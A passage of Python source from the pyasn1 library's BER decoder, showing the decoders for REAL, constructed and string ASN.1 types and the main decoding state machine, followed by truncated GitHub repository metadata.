return self._createComponent(asn1Spec, tagSet, oid, **options), tail
class RealDecoder(AbstractSimpleDecoder):
protoComponent = univ.Real()
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if tagSet[0].tagFormat != tag.tagFormatSimple:
raise error.PyAsn1Error('Simple tag format expected')
head, tail = substrate[:length], substrate[length:]
if not head:
return self._createComponent(asn1Spec, tagSet, 0.0, **options), tail
fo = oct2int(head[0])
head = head[1:]
if fo & 0x80: # binary encoding
if not head:
raise error.PyAsn1Error("Incomplete floating-point value")
if LOG:
LOG('decoding binary encoded REAL')
n = (fo & 0x03) + 1
if n == 4:
n = oct2int(head[0])
head = head[1:]
eo, head = head[:n], head[n:]
if not eo or not head:
raise error.PyAsn1Error('Real exponent screwed')
e = oct2int(eo[0]) & 0x80 and -1 or 0
while eo: # exponent
e <<= 8
e |= oct2int(eo[0])
eo = eo[1:]
b = fo >> 4 & 0x03 # base bits
if b > 2:
raise error.PyAsn1Error('Illegal Real base')
if b == 1: # encbase = 8
e *= 3
elif b == 2: # encbase = 16
e *= 4
p = 0
while head: # value
p <<= 8
p |= oct2int(head[0])
head = head[1:]
if fo & 0x40: # sign bit
p = -p
sf = fo >> 2 & 0x03 # scale bits
p *= 2 ** sf
value = (p, 2, e)
elif fo & 0x40: # infinite value
if LOG:
LOG('decoding infinite REAL')
value = fo & 0x01 and '-inf' or 'inf'
elif fo & 0xc0 == 0: # character encoding
if not head:
raise error.PyAsn1Error("Incomplete floating-point value")
if LOG:
LOG('decoding character encoded REAL')
try:
if fo & 0x3 == 0x1: # NR1
value = (int(head), 10, 0)
elif fo & 0x3 == 0x2: # NR2
value = float(head)
elif fo & 0x3 == 0x3: # NR3
value = float(head)
else:
raise error.SubstrateUnderrunError(
'Unknown NR (tag %s)' % fo
)
except ValueError:
raise error.SubstrateUnderrunError(
'Bad character Real syntax'
)
else:
raise error.SubstrateUnderrunError(
'Unknown encoding (tag %s)' % fo
)
return self._createComponent(asn1Spec, tagSet, value, **options), tail
class AbstractConstructedDecoder(AbstractDecoder):
protoComponent = None
class UniversalConstructedTypeDecoder(AbstractConstructedDecoder):
protoRecordComponent = None
protoSequenceComponent = None
def _getComponentTagMap(self, asn1Object, idx):
raise NotImplementedError()
def _getComponentPositionByType(self, asn1Object, tagSet, idx):
raise NotImplementedError()
def _decodeComponents(self, substrate, tagSet=None, decodeFun=None, **options):
components = []
componentTypes = set()
while substrate:
component, substrate = decodeFun(substrate, **options)
if component is eoo.endOfOctets:
break
components.append(component)
componentTypes.add(component.tagSet)
# Now we have to guess is it SEQUENCE/SET or SEQUENCE OF/SET OF
# The heuristics is:
# * 1+ components of different types -> likely SEQUENCE/SET
# * otherwise -> likely SEQUENCE OF/SET OF
if len(componentTypes) > 1:
protoComponent = self.protoRecordComponent
else:
protoComponent = self.protoSequenceComponent
asn1Object = protoComponent.clone(
# construct tagSet from base tag from prototype ASN.1 object
# and additional tags recovered from the substrate
tagSet=tag.TagSet(protoComponent.tagSet.baseTag, *tagSet.superTags)
)
if LOG:
LOG('guessed %r container type (pass `asn1Spec` to guide the '
'decoder)' % asn1Object)
for idx, component in enumerate(components):
asn1Object.setComponentByPosition(
idx, component,
verifyConstraints=False,
matchTags=False, matchConstraints=False
)
return asn1Object, substrate
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if tagSet[0].tagFormat != tag.tagFormatConstructed:
raise error.PyAsn1Error('Constructed tag format expected')
head, tail = substrate[:length], substrate[length:]
if substrateFun is not None:
if asn1Spec is not None:
asn1Object = asn1Spec.clone()
elif self.protoComponent is not None:
asn1Object = self.protoComponent.clone(tagSet=tagSet)
else:
asn1Object = self.protoRecordComponent, self.protoSequenceComponent
return substrateFun(asn1Object, substrate, length)
if asn1Spec is None:
asn1Object, trailing = self._decodeComponents(
head, tagSet=tagSet, decodeFun=decodeFun, **options
)
if trailing:
if LOG:
LOG('Unused trailing %d octets encountered: %s' % (
len(trailing), debug.hexdump(trailing)))
return asn1Object, tail
asn1Object = asn1Spec.clone()
asn1Object.clear()
if asn1Spec.typeId in (univ.Sequence.typeId, univ.Set.typeId):
namedTypes = asn1Spec.componentType
isSetType = asn1Spec.typeId == univ.Set.typeId
isDeterministic = not isSetType and not namedTypes.hasOptionalOrDefault
if LOG:
LOG('decoding %sdeterministic %s type %r chosen by type ID' % (
not isDeterministic and 'non-' or '', isSetType and 'SET' or '',
asn1Spec))
seenIndices = set()
idx = 0
while head:
if not namedTypes:
componentType = None
elif isSetType:
componentType = namedTypes.tagMapUnique
else:
try:
if isDeterministic:
componentType = namedTypes[idx].asn1Object
elif namedTypes[idx].isOptional or namedTypes[idx].isDefaulted:
componentType = namedTypes.getTagMapNearPosition(idx)
else:
componentType = namedTypes[idx].asn1Object
except IndexError:
raise error.PyAsn1Error(
'Excessive components decoded at %r' % (asn1Spec,)
)
component, head = decodeFun(head, componentType, **options)
if not isDeterministic and namedTypes:
if isSetType:
idx = namedTypes.getPositionByType(component.effectiveTagSet)
elif namedTypes[idx].isOptional or namedTypes[idx].isDefaulted:
idx = namedTypes.getPositionNearType(component.effectiveTagSet, idx)
asn1Object.setComponentByPosition(
idx, component,
verifyConstraints=False,
matchTags=False, matchConstraints=False
)
seenIndices.add(idx)
idx += 1
if LOG:
LOG('seen component indices %s' % seenIndices)
if namedTypes:
if not namedTypes.requiredComponents.issubset(seenIndices):
raise error.PyAsn1Error(
'ASN.1 object %s has uninitialized '
'components' % asn1Object.__class__.__name__)
if namedTypes.hasOpenTypes:
openTypes = options.get('openTypes', {})
if LOG:
LOG('using open types map: %r' % openTypes)
if openTypes or options.get('decodeOpenTypes', False):
for idx, namedType in enumerate(namedTypes.namedTypes):
if not namedType.openType:
continue
if namedType.isOptional and not asn1Object.getComponentByPosition(idx).isValue:
continue
governingValue = asn1Object.getComponentByName(
namedType.openType.name
)
try:
openType = openTypes[governingValue]
except KeyError:
try:
openType = namedType.openType[governingValue]
except KeyError:
if LOG:
LOG('failed to resolve open type by governing '
'value %r' % (governingValue,))
continue
if LOG:
LOG('resolved open type %r by governing '
'value %r' % (openType, governingValue))
containerValue = asn1Object.getComponentByPosition(idx)
if containerValue.typeId in (
univ.SetOf.typeId, univ.SequenceOf.typeId):
for pos, containerElement in enumerate(
containerValue):
component, rest = decodeFun(
containerValue[pos].asOctets(),
asn1Spec=openType, **options
)
containerValue[pos] = component
else:
component, rest = decodeFun(
asn1Object.getComponentByPosition(idx).asOctets(),
asn1Spec=openType, **options
)
asn1Object.setComponentByPosition(idx, component)
else:
asn1Object.verifySizeSpec()
else:
asn1Object = asn1Spec.clone()
asn1Object.clear()
componentType = asn1Spec.componentType
if LOG:
LOG('decoding type %r chosen by given `asn1Spec`' % componentType)
idx = 0
while head:
component, head = decodeFun(head, componentType, **options)
asn1Object.setComponentByPosition(
idx, component,
verifyConstraints=False,
matchTags=False, matchConstraints=False
)
idx += 1
return asn1Object, tail
def indefLenValueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if tagSet[0].tagFormat != tag.tagFormatConstructed:
raise error.PyAsn1Error('Constructed tag format expected')
if substrateFun is not None:
if asn1Spec is not None:
asn1Object = asn1Spec.clone()
elif self.protoComponent is not None:
asn1Object = self.protoComponent.clone(tagSet=tagSet)
else:
asn1Object = self.protoRecordComponent, self.protoSequenceComponent
return substrateFun(asn1Object, substrate, length)
if asn1Spec is None:
return self._decodeComponents(
substrate, tagSet=tagSet, decodeFun=decodeFun,
**dict(options, allowEoo=True)
)
asn1Object = asn1Spec.clone()
asn1Object.clear()
if asn1Spec.typeId in (univ.Sequence.typeId, univ.Set.typeId):
namedTypes = asn1Object.componentType
isSetType = asn1Object.typeId == univ.Set.typeId
isDeterministic = not isSetType and not namedTypes.hasOptionalOrDefault
if LOG:
LOG('decoding %sdeterministic %s type %r chosen by type ID' % (
not isDeterministic and 'non-' or '', isSetType and 'SET' or '',
asn1Spec))
seenIndices = set()
idx = 0
while substrate:
if len(namedTypes) <= idx:
asn1Spec = None
elif isSetType:
asn1Spec = namedTypes.tagMapUnique
else:
try:
if isDeterministic:
asn1Spec = namedTypes[idx].asn1Object
elif namedTypes[idx].isOptional or namedTypes[idx].isDefaulted:
asn1Spec = namedTypes.getTagMapNearPosition(idx)
else:
asn1Spec = namedTypes[idx].asn1Object
except IndexError:
raise error.PyAsn1Error(
'Excessive components decoded at %r' % (asn1Object,)
)
component, substrate = decodeFun(substrate, asn1Spec, allowEoo=True, **options)
if component is eoo.endOfOctets:
break
if not isDeterministic and namedTypes:
if isSetType:
idx = namedTypes.getPositionByType(component.effectiveTagSet)
elif namedTypes[idx].isOptional or namedTypes[idx].isDefaulted:
idx = namedTypes.getPositionNearType(component.effectiveTagSet, idx)
asn1Object.setComponentByPosition(
idx, component,
verifyConstraints=False,
matchTags=False, matchConstraints=False
)
seenIndices.add(idx)
idx += 1
else:
raise error.SubstrateUnderrunError(
'No EOO seen before substrate ends'
)
if LOG:
LOG('seen component indices %s' % seenIndices)
if namedTypes:
if not namedTypes.requiredComponents.issubset(seenIndices):
raise error.PyAsn1Error('ASN.1 object %s has uninitialized components' % asn1Object.__class__.__name__)
if namedTypes.hasOpenTypes:
openTypes = options.get('openTypes', {})
if LOG:
LOG('using open types map: %r' % openTypes)
if openTypes or options.get('decodeOpenTypes', False):
for idx, namedType in enumerate(namedTypes.namedTypes):
if not namedType.openType:
continue
if namedType.isOptional and not asn1Object.getComponentByPosition(idx).isValue:
continue
governingValue = asn1Object.getComponentByName(
namedType.openType.name
)
try:
openType = openTypes[governingValue]
except KeyError:
try:
openType = namedType.openType[governingValue]
except KeyError:
if LOG:
LOG('failed to resolve open type by governing '
'value %r' % (governingValue,))
continue
if LOG:
LOG('resolved open type %r by governing '
'value %r' % (openType, governingValue))
containerValue = asn1Object.getComponentByPosition(idx)
if containerValue.typeId in (
univ.SetOf.typeId, univ.SequenceOf.typeId):
for pos, containerElement in enumerate(
containerValue):
component, rest = decodeFun(
containerValue[pos].asOctets(),
asn1Spec=openType, **dict(options, allowEoo=True)
)
containerValue[pos] = component
else:
component, rest = decodeFun(
asn1Object.getComponentByPosition(idx).asOctets(),
asn1Spec=openType, **dict(options, allowEoo=True)
)
if component is not eoo.endOfOctets:
asn1Object.setComponentByPosition(idx, component)
else:
asn1Object.verifySizeSpec()
else:
asn1Object = asn1Spec.clone()
asn1Object.clear()
componentType = asn1Spec.componentType
if LOG:
LOG('decoding type %r chosen by given `asn1Spec`' % componentType)
idx = 0
while substrate:
component, substrate = decodeFun(substrate, componentType, allowEoo=True, **options)
if component is eoo.endOfOctets:
break
asn1Object.setComponentByPosition(
idx, component,
verifyConstraints=False,
matchTags=False, matchConstraints=False
)
idx += 1
else:
raise error.SubstrateUnderrunError(
'No EOO seen before substrate ends'
)
return asn1Object, substrate
class SequenceOrSequenceOfDecoder(UniversalConstructedTypeDecoder):
protoRecordComponent = univ.Sequence()
protoSequenceComponent = univ.SequenceOf()
class SequenceDecoder(SequenceOrSequenceOfDecoder):
protoComponent = univ.Sequence()
class SequenceOfDecoder(SequenceOrSequenceOfDecoder):
protoComponent = univ.SequenceOf()
class SetOrSetOfDecoder(UniversalConstructedTypeDecoder):
protoRecordComponent = univ.Set()
protoSequenceComponent = univ.SetOf()
class SetDecoder(SetOrSetOfDecoder):
protoComponent = univ.Set()
class SetOfDecoder(SetOrSetOfDecoder):
protoComponent = univ.SetOf()
class ChoiceDecoder(AbstractConstructedDecoder):
protoComponent = univ.Choice()
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
head, tail = substrate[:length], substrate[length:]
if asn1Spec is None:
asn1Object = self.protoComponent.clone(tagSet=tagSet)
else:
asn1Object = asn1Spec.clone()
if substrateFun:
return substrateFun(asn1Object, substrate, length)
if asn1Object.tagSet == tagSet:
if LOG:
LOG('decoding %s as explicitly tagged CHOICE' % (tagSet,))
component, head = decodeFun(
head, asn1Object.componentTagMap, **options
)
else:
if LOG:
LOG('decoding %s as untagged CHOICE' % (tagSet,))
component, head = decodeFun(
head, asn1Object.componentTagMap,
tagSet, length, state, **options
)
effectiveTagSet = component.effectiveTagSet
if LOG:
LOG('decoded component %s, effective tag set %s' % (component, effectiveTagSet))
asn1Object.setComponentByType(
effectiveTagSet, component,
verifyConstraints=False,
matchTags=False, matchConstraints=False,
innerFlag=False
)
return asn1Object, tail
def indefLenValueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if asn1Spec is None:
asn1Object = self.protoComponent.clone(tagSet=tagSet)
else:
asn1Object = asn1Spec.clone()
if substrateFun:
return substrateFun(asn1Object, substrate, length)
if asn1Object.tagSet == tagSet:
if LOG:
LOG('decoding %s as explicitly tagged CHOICE' % (tagSet,))
component, substrate = decodeFun(
substrate, asn1Object.componentType.tagMapUnique, **options
)
# eat up EOO marker
eooMarker, substrate = decodeFun(
substrate, allowEoo=True, **options
)
if eooMarker is not eoo.endOfOctets:
raise error.PyAsn1Error('No EOO seen before substrate ends')
else:
if LOG:
LOG('decoding %s as untagged CHOICE' % (tagSet,))
component, substrate = decodeFun(
substrate, asn1Object.componentType.tagMapUnique,
tagSet, length, state, **options
)
effectiveTagSet = component.effectiveTagSet
if LOG:
LOG('decoded component %s, effective tag set %s' % (component, effectiveTagSet))
asn1Object.setComponentByType(
effectiveTagSet, component,
verifyConstraints=False,
matchTags=False, matchConstraints=False,
innerFlag=False
)
return asn1Object, substrate
class AnyDecoder(AbstractSimpleDecoder):
protoComponent = univ.Any()
def valueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if asn1Spec is None:
isUntagged = True
elif asn1Spec.__class__ is tagmap.TagMap:
isUntagged = tagSet not in asn1Spec.tagMap
else:
isUntagged = tagSet != asn1Spec.tagSet
if isUntagged:
fullSubstrate = options['fullSubstrate']
# untagged Any container, recover inner header substrate
length += len(fullSubstrate) - len(substrate)
substrate = fullSubstrate
if LOG:
LOG('decoding as untagged ANY, substrate %s' % debug.hexdump(substrate))
if substrateFun:
return substrateFun(self._createComponent(asn1Spec, tagSet, noValue, **options),
substrate, length)
head, tail = substrate[:length], substrate[length:]
return self._createComponent(asn1Spec, tagSet, head, **options), tail
def indefLenValueDecoder(self, substrate, asn1Spec,
tagSet=None, length=None, state=None,
decodeFun=None, substrateFun=None,
**options):
if asn1Spec is None:
isTagged = False
elif asn1Spec.__class__ is tagmap.TagMap:
isTagged = tagSet in asn1Spec.tagMap
else:
isTagged = tagSet == asn1Spec.tagSet
if isTagged:
# tagged Any type -- consume header substrate
header = null
if LOG:
LOG('decoding as tagged ANY')
else:
fullSubstrate = options['fullSubstrate']
# untagged Any, recover header substrate
header = fullSubstrate[:-len(substrate)]
if LOG:
LOG('decoding as untagged ANY, header substrate %s' % debug.hexdump(header))
# Any components do not inherit initial tag
asn1Spec = self.protoComponent
if substrateFun and substrateFun is not self.substrateCollector:
asn1Object = self._createComponent(asn1Spec, tagSet, noValue, **options)
return substrateFun(asn1Object, header + substrate, length + len(header))
if LOG:
LOG('assembling constructed serialization')
# All inner fragments are of the same type, treat them as octet string
substrateFun = self.substrateCollector
while substrate:
component, substrate = decodeFun(substrate, asn1Spec,
substrateFun=substrateFun,
allowEoo=True, **options)
if component is eoo.endOfOctets:
break
header += component
else:
raise error.SubstrateUnderrunError(
'No EOO seen before substrate ends'
)
if substrateFun:
return header, substrate
else:
return self._createComponent(asn1Spec, tagSet, header, **options), substrate
# character string types
class UTF8StringDecoder(OctetStringDecoder):
protoComponent = char.UTF8String()
class NumericStringDecoder(OctetStringDecoder):
protoComponent = char.NumericString()
class PrintableStringDecoder(OctetStringDecoder):
protoComponent = char.PrintableString()
class TeletexStringDecoder(OctetStringDecoder):
protoComponent = char.TeletexString()
class VideotexStringDecoder(OctetStringDecoder):
protoComponent = char.VideotexString()
class IA5StringDecoder(OctetStringDecoder):
protoComponent = char.IA5String()
class GraphicStringDecoder(OctetStringDecoder):
protoComponent = char.GraphicString()
class VisibleStringDecoder(OctetStringDecoder):
protoComponent = char.VisibleString()
class GeneralStringDecoder(OctetStringDecoder):
protoComponent = char.GeneralString()
class UniversalStringDecoder(OctetStringDecoder):
protoComponent = char.UniversalString()
class BMPStringDecoder(OctetStringDecoder):
protoComponent = char.BMPString()
# "useful" types
class ObjectDescriptorDecoder(OctetStringDecoder):
protoComponent = useful.ObjectDescriptor()
class GeneralizedTimeDecoder(OctetStringDecoder):
protoComponent = useful.GeneralizedTime()
class UTCTimeDecoder(OctetStringDecoder):
protoComponent = useful.UTCTime()
tagMap = {
univ.Integer.tagSet: IntegerDecoder(),
univ.Boolean.tagSet: BooleanDecoder(),
univ.BitString.tagSet: BitStringDecoder(),
univ.OctetString.tagSet: OctetStringDecoder(),
univ.Null.tagSet: NullDecoder(),
univ.ObjectIdentifier.tagSet: ObjectIdentifierDecoder(),
univ.Enumerated.tagSet: IntegerDecoder(),
univ.Real.tagSet: RealDecoder(),
univ.Sequence.tagSet: SequenceOrSequenceOfDecoder(), # conflicts with SequenceOf
univ.Set.tagSet: SetOrSetOfDecoder(), # conflicts with SetOf
univ.Choice.tagSet: ChoiceDecoder(), # conflicts with Any
# character string types
char.UTF8String.tagSet: UTF8StringDecoder(),
char.NumericString.tagSet: NumericStringDecoder(),
char.PrintableString.tagSet: PrintableStringDecoder(),
char.TeletexString.tagSet: TeletexStringDecoder(),
char.VideotexString.tagSet: VideotexStringDecoder(),
char.IA5String.tagSet: IA5StringDecoder(),
char.GraphicString.tagSet: GraphicStringDecoder(),
char.VisibleString.tagSet: VisibleStringDecoder(),
char.GeneralString.tagSet: GeneralStringDecoder(),
char.UniversalString.tagSet: UniversalStringDecoder(),
char.BMPString.tagSet: BMPStringDecoder(),
# useful types
useful.ObjectDescriptor.tagSet: ObjectDescriptorDecoder(),
useful.GeneralizedTime.tagSet: GeneralizedTimeDecoder(),
useful.UTCTime.tagSet: UTCTimeDecoder()
}
# Type-to-codec map for ambiguous ASN.1 types
typeMap = {
univ.Set.typeId: SetDecoder(),
univ.SetOf.typeId: SetOfDecoder(),
univ.Sequence.typeId: SequenceDecoder(),
univ.SequenceOf.typeId: SequenceOfDecoder(),
univ.Choice.typeId: ChoiceDecoder(),
univ.Any.typeId: AnyDecoder()
}
# Put in non-ambiguous types for faster codec lookup
for typeDecoder in tagMap.values():
if typeDecoder.protoComponent is not None:
typeId = typeDecoder.protoComponent.__class__.typeId
if typeId is not None and typeId not in typeMap:
typeMap[typeId] = typeDecoder
(stDecodeTag,
stDecodeLength,
stGetValueDecoder,
stGetValueDecoderByAsn1Spec,
stGetValueDecoderByTag,
stTryAsExplicitTag,
stDecodeValue,
stDumpRawValue,
stErrorCondition,
stStop) = [x for x in range(10)]
class Decoder(object):
defaultErrorState = stErrorCondition
#defaultErrorState = stDumpRawValue
defaultRawDecoder = AnyDecoder()
supportIndefLength = True
# noinspection PyDefaultArgument
def __init__(self, tagMap, typeMap={}):
self.__tagMap = tagMap
self.__typeMap = typeMap
# Tag & TagSet objects caches
self.__tagCache = {}
self.__tagSetCache = {}
self.__eooSentinel = ints2octs((0, 0))
def __call__(self, substrate, asn1Spec=None,
tagSet=None, length=None, state=stDecodeTag,
decodeFun=None, substrateFun=None,
**options):
if LOG:
LOG('decoder called at scope %s with state %d, working with up to %d octets of substrate: %s' % (debug.scope, state, len(substrate), debug.hexdump(substrate)))
allowEoo = options.pop('allowEoo', False)
# Look for end-of-octets sentinel
if allowEoo and self.supportIndefLength:
if substrate[:2] == self.__eooSentinel:
if LOG:
LOG('end-of-octets sentinel found')
return eoo.endOfOctets, substrate[2:]
value = noValue
tagMap = self.__tagMap
typeMap = self.__typeMap
tagCache = self.__tagCache
tagSetCache = self.__tagSetCache
fullSubstrate = substrate
while state is not stStop:
if state is stDecodeTag:
if not substrate:
raise error.SubstrateUnderrunError(
'Short octet stream on tag decoding'
)
# Decode tag
isShortTag = True
firstOctet = substrate[0]
substrate = substrate[1:]
try:
lastTag = tagCache[firstOctet]
except KeyError:
integerTag = oct2int(firstOctet)
tagClass = integerTag & 0xC0
tagFormat = integerTag & 0x20
tagId = integerTag & 0x1F
if tagId == 0x1F:
isShortTag = False
lengthOctetIdx = 0
tagId = 0
try:
while True:
integerTag = oct2int(substrate[lengthOctetIdx])
lengthOctetIdx += 1
tagId <<= 7
tagId |= (integerTag & 0x7F)
if not integerTag & 0x80:
break
substrate = substrate[lengthOctetIdx:]
except IndexError:
raise error.SubstrateUnderrunError(
'Short octet stream on long tag decoding'
)
lastTag = tag.Tag(
tagClass=tagClass, tagFormat=tagFormat, tagId=tagId
)
if isShortTag:
# cache short tags
tagCache[firstOctet] = lastTag
if tagSet is None:
if isShortTag:
try:
tagSet = tagSetCache[firstOctet]
except KeyError:
# base tag not recovered
tagSet = tag.TagSet((), lastTag)
tagSetCache[firstOctet] = tagSet
else:
tagSet = tag.TagSet((), lastTag)
else:
tagSet = lastTag + tagSet
state = stDecodeLength
if LOG:
LOG('tag decoded into %s, decoding length' % tagSet)
if state is stDecodeLength:
# Decode length
if not substrate:
raise error.SubstrateUnderrunError(
'Short octet stream on length decoding'
)
firstOctet = oct2int(substrate[0])
if firstOctet < 128:
size = 1
length = firstOctet
elif firstOctet > 128:
size = firstOctet & 0x7F
# encoded in size bytes
encodedLength = octs2ints(substrate[1:size + 1])
# missing check on maximum size, which shouldn't be a
# problem, we can handle more than is possible
if len(encodedLength) != size:
raise error.SubstrateUnderrunError(
'%s<%s at %s' % (size, len(encodedLength), tagSet)
)
length = 0
for lengthOctet in encodedLength:
length <<= 8
length |= lengthOctet
size += 1
else:
size = 1
length = -1
substrate = substrate[size:]
if length == -1:
if not self.supportIndefLength:
raise error.PyAsn1Error('Indefinite length encoding not supported by this codec')
else:
if len(substrate) < length:
raise error.SubstrateUnderrunError('%d-octet short' % (length - len(substrate)))
state = stGetValueDecoder
if LOG:
LOG('value length decoded into %d, payload substrate is: %s' % (length, debug.hexdump(length == -1 and substrate or substrate[:length])))
if state is stGetValueDecoder:
if asn1Spec is None:
state = stGetValueDecoderByTag
else:
state = stGetValueDecoderByAsn1Spec
#
# There're two ways of creating subtypes in ASN.1 what influences
# decoder operation. These methods are:
# 1) Either base types used in or no IMPLICIT tagging has been
# applied on subtyping.
# 2) Subtype syntax drops base type information (by means of
# IMPLICIT tagging.
# The first case allows for complete tag recovery from substrate
# while the second one requires original ASN.1 type spec for
# decoding.
#
# In either case a set of tags (tagSet) is coming from substrate
# in an incremental, tag-by-tag fashion (this is the case of
# EXPLICIT tag which is most basic). Outermost tag comes first
# from the wire.
#
if state is stGetValueDecoderByTag:
try:
concreteDecoder = tagMap[tagSet]
except KeyError:
concreteDecoder = None
if concreteDecoder:
state = stDecodeValue
else:
try:
concreteDecoder = tagMap[tagSet[:1]]
except KeyError:
concreteDecoder = None
if concreteDecoder:
state = stDecodeValue
else:
state = stTryAsExplicitTag
if LOG:
LOG('codec %s chosen by a built-in type, decoding %s' % (concreteDecoder and concreteDecoder.__class__.__name__ or "<none>", state is stDecodeValue and 'value' or 'as explicit tag'))
debug.scope.push(concreteDecoder is None and '?' or concreteDecoder.protoComponent.__class__.__name__)
if state is stGetValueDecoderByAsn1Spec:
if asn1Spec.__class__ is tagmap.TagMap:
try:
chosenSpec = asn1Spec[tagSet]
except KeyError:
chosenSpec = None
if LOG:
LOG('candidate ASN.1 spec is a map of:')
for firstOctet, v in asn1Spec.presentTypes.items():
LOG(' %s -> %s' % (firstOctet, v.__class__.__name__))
if asn1Spec.skipTypes:
LOG('but neither of: ')
for firstOctet, v in asn1Spec.skipTypes.items():
LOG(' %s -> %s' % (firstOctet, v.__class__.__name__))
LOG('new candidate ASN.1 spec is %s, chosen by %s' % (chosenSpec is None and '<none>' or chosenSpec.prettyPrintType(), tagSet))
elif tagSet == asn1Spec.tagSet or tagSet in asn1Spec.tagMap:
chosenSpec = asn1Spec
if LOG:
LOG('candidate ASN.1 spec is %s' % asn1Spec.__class__.__name__)
else:
chosenSpec = None
if chosenSpec is not None:
try:
# ambiguous type or just faster codec lookup
concreteDecoder = typeMap[chosenSpec.typeId]
if LOG:
LOG('value decoder chosen for an ambiguous type by type ID %s' % (chosenSpec.typeId,))
except KeyError:
# use base type for codec lookup to recover untagged types
baseTagSet = tag.TagSet(chosenSpec.tagSet.baseTag, chosenSpec.tagSet.baseTag)
try:
# base type or tagged subtype
concreteDecoder = tagMap[baseTagSet]
if LOG:
LOG('value decoder chosen by base %s' % (baseTagSet,))
except KeyError:
concreteDecoder = None
if concreteDecoder:
asn1Spec = chosenSpec
state = stDecodeValue
else:
state = stTryAsExplicitTag
else:
concreteDecoder = None
state = stTryAsExplicitTag
if LOG:
LOG('codec %s chosen by ASN.1 spec, decoding %s' % (state is stDecodeValue and concreteDecoder.__class__.__name__ or "<none>", state is stDecodeValue and 'value' or 'as explicit tag'))
debug.scope.push(chosenSpec is None and '?' or chosenSpec.__class__.__name__)
if state is stDecodeValue:
if not options.get('recursiveFlag', True) and not substrateFun: # deprecate this
substrateFun = lambda a, b, c: (a, b[:c])
options.update(fullSubstrate=fullSubstrate)
if length == -1: # indef length
value, substrate = concreteDecoder.indefLenValueDecoder(
substrate, asn1Spec,
tagSet, length, stGetValueDecoder,
self, substrateFun,
**options
)
else:
value, substrate = concreteDecoder.valueDecoder(
substrate, asn1Spec,
tagSet, length, stGetValueDecoder,
self, substrateFun,
**options
)
if LOG:
LOG('codec %s yields type %s, value:\n%s\n...remaining substrate is: %s' % (concreteDecoder.__class__.__name__, value.__class__.__name__, isinstance(value, base.Asn1Item) and value.prettyPrint() or value, substrate and debug.hexdump(substrate) or '<none>'))
state = stStop
break
if state is stTryAsExplicitTag:
if (tagSet and
tagSet[0].tagFormat == tag.tagFormatConstructed and
tagSet[0].tagClass != tag.tagClassUniversal):
# Assume explicit tagging
concreteDecoder = explicitTagDecoder
state = stDecodeValue
else:
concreteDecoder = None
state = self.defaultErrorState
if LOG:
LOG('codec %s chosen, decoding %s' % (concreteDecoder and concreteDecoder.__class__.__name__ or "<none>", state is stDecodeValue and 'value' or 'as failure'))
if state is stDumpRawValue:
concreteDecoder = self.defaultRawDecoder
if LOG:
LOG('codec %s chosen, decoding value' % concreteDecoder.__class__.__name__)
state = stDecodeValue
if state is stErrorCondition:
raise error.PyAsn1Error(
'%s not in asn1Spec: %r' % (tagSet, asn1Spec)
)
if LOG:
debug.scope.pop()
LOG('decoder left scope %s, call completed' % debug.scope)
return value, substrate
#: Turns BER octet stream into an ASN.1 object.
#:
#: Takes BER octet-stream and decode it into an ASN.1 object
#: (e.g. :py:class:`~pyasn1.type.base.PyAsn1Item` derivative) which
#: may be a scalar or an arbitrary nested structure.
#:
#: Parameters
#: ----------
#: substrate: :py:class:`bytes` (Python 3) or :py:class:`str` (Python 2)
#: BER octet-stream
#:
#: Keyword Args
#: ------------
#: asn1Spec: any pyasn1 type object e.g. :py:class:`~pyasn1.type.base.PyAsn1Item` derivative
#: A pyasn1 type object to act as a template guiding the decoder. Depending on the ASN.1 structure
#: being decoded, *asn1Spec* may or may not be required. Most common reason for
#: it to require is that ASN.1 structure is encoded in *IMPLICIT* tagging mode.
#:
#: Returns
#: -------
#: : :py:class:`tuple`
#: A tuple of pyasn1 object recovered from BER substrate (:py:class:`~pyasn1.type.base.PyAsn1Item` derivative)
#: and the unprocessed trailing portion of the *substrate* (may be empty)
#:
#: Raises
#: ------
#: ~pyasn1.error.PyAsn1Error, ~pyasn1.error.SubstrateUnderrunError
#: On decoding errors
#:
#: Examples
#: --------
#: Decode BER serialisation without ASN.1 schema
#:
#: .. code-block:: pycon
#:
#: >>> s, _ = decode(b'0\t\x02\x01\x01\x02\x01\x02\x02\x01\x03')
#: >>> str(s)
#: SequenceOf:
#: 1 2 3
#:
#: Decode BER serialisation with ASN.1 schema
#:
#: .. code-block:: pycon
#:
#: >>> seq = SequenceOf(componentType=Integer())
#: >>> s, _ = decode(b'0\t\x02\x01\x01\x02\x01\x02\x02\x01\x03', asn1Spec=seq)
#: >>> str(s)
#: SequenceOf:
#: 1 2 3
#:
decode = Decoder(tagMap, typeMap)
# XXX
# non-recursive decoding; return position rather than substrate
| {
"content_hash": "f357e8a473eb0df789b50edc39585758",
"timestamp": "",
"source": "github",
"line_count": 1644,
"max_line_length": 277,
"avg_line_length": 35.2147201946472,
"alnum_prop": 0.5351769643998411,
"repo_name": "kawamon/hue",
"id": "3f2d180d1d8556b71b2d24c354a4c54605bb15b0",
"size": "58050",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/pyasn1-0.4.6/pyasn1/codec/ber/decoder.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "5786"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "Batchfile",
"bytes": "118907"
},
{
"name": "C",
"bytes": "3196521"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "308860"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "1050129"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "D",
"bytes": "324"
